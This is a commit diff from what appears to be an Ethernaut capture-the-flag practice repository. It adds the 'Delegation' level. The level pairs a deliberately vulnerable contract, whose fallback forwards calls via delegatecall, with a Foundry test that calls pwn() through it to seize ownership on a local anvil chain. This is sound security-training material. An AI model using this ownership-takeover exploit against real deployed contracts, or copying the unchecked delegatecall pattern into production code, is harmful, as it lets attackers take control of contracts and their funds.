06_Delegation

src/01_Fallback.sol

@@ -6,7 +6,7 @@ Author: @BoscoHuang
 
 Process:
 - Deploy Fallback contract in anvil: 
-    1. anvil
+    0. anvil
     1. forge create src/01_Fallback.sol:Fallback  --rpc-url http://127.0.0.1:8545 --private-key 0x....
 */
 

src/02_Fallout.sol

@@ -9,7 +9,7 @@ Author: @BoscoHuang
 Process:
 - Install openzeppelin-contracts: forge install OpenZeppelin/[email protected]
 - Deploy Fallout contract in anvil: 
-    1. anvil
+    0. anvil
     1. forge create src/02_Fallout.sol:Fallout  --rpc-url http://127.0.0.1:8545 --private-key 0x....
 */
 

src/03_CoinFlip.sol

@@ -6,7 +6,7 @@ Author: @BoscoHuang
 
 Process:
 - Deploy Fallout contract in anvil: 
-    1. anvil
+    0. anvil
     1. forge create src/03_CoinFlip.sol:CoinFlip  --rpc-url http://127.0.0.1:8545 --private-key 0x....
 */
 

src/04_Telephone.sol

@@ -6,7 +6,7 @@ Author: @BoscoHuang
 
 Process:
 - Deploy Fallout contract in anvil: 
-    1. anvil
+    0. anvil
     1. forge create src/04_Telephone.sol:Telephone  --rpc-url http://127.0.0.1:8545 --private-key 0x....
 */
 

src/05_Token.sol

@@ -6,7 +6,7 @@ Author: @BoscoHuang
 
 Process:
 - Deploy Token contract in anvil: 
-    1. anvil
+    0. anvil
     1. forge create src/05_Token.sol:Token  --rpc-url http://127.0.0.1:8545 --private-key 0x.... --constructor-args 20
 */
 

src/06_Delegation.sol

@@ -0,0 +1,41 @@
+// SPDX-License-Identifier: MIT
+pragma solidity ^0.8.0;
+
+/*
+Author: @BoscoHuang
+
+Process:
+- Deploy Token contract in anvil: 
+    0. anvil
+    1. forge create src/06_Delegation.sol:Delegate  --rpc-url http://127.0.0.1:8545 --private-key 0x.... --constructor-args 0x
+    2. forge create src/06_Delegation.sol:Delegation  --rpc-url http://127.0.0.1:8545 --private-key 0x.... --constructor-args 0x....
+*/
+
+contract Delegate {
+    address public owner;
+
+    constructor(address _owner) {
+        owner = _owner;
+    }
+
+    function pwn() public {
+        owner = msg.sender;
+    }
+}
+
+contract Delegation {
+    address public owner;
+    Delegate delegate;
+
+    constructor(address _delegateAddress) {
+        delegate = Delegate(_delegateAddress);
+        owner = msg.sender;
+    }
+
+    fallback() external {
+        (bool result,) = address(delegate).delegatecall(msg.data);
+        if (result) {
+            this;
+        }
+    }
+}

test/06_Delegation.t.sol

@@ -0,0 +1,40 @@
+// SPDX-License-Identifier: MIT
+pragma solidity ^0.8.0;
+
+import "ds-test/test.sol";
+import "forge-std/Test.sol";
+import "../src/06_Delegation.sol";
+
+/*
+Author: @BoscoHuang
+
+Attack Process:
+- The `fallback` function is used to delegate the call to the `Delegate` contract.
+- The `Delegate` contract has a `pwn` function that sets the owner to the caller.
+- The `fallback` function is called when the `Delegate` contract does not have a function that matches the function signature of the caller.
+
+Command:
+- forge test --match-contract DelegationTest --fork-url http://127.0.0.1:8545 -vvv
+*/
+
+
+contract DelegationTest is Test {
+    Delegation Ethernaut06;
+
+    function setUp() public {
+        Ethernaut06 = Delegation(payable(0x8464135c8F25Da09e49BC8782676a84730C318bC)); // Delegation contract address in anvil
+    }
+
+    function testEthernaut06() public {
+        console.log("Owner before:", Ethernaut06.owner());
+
+        (bool success, ) = address(Ethernaut06).call(abi.encodeWithSignature("pwn()"));
+        require(success, "pwn failed");
+
+        assert(address(this) == Ethernaut06.owner()); // Attacker becomes the owner
+
+        console.log("address(this):", address(this));
+
+        console.log("Owner after:", Ethernaut06.owner());
+    }
+}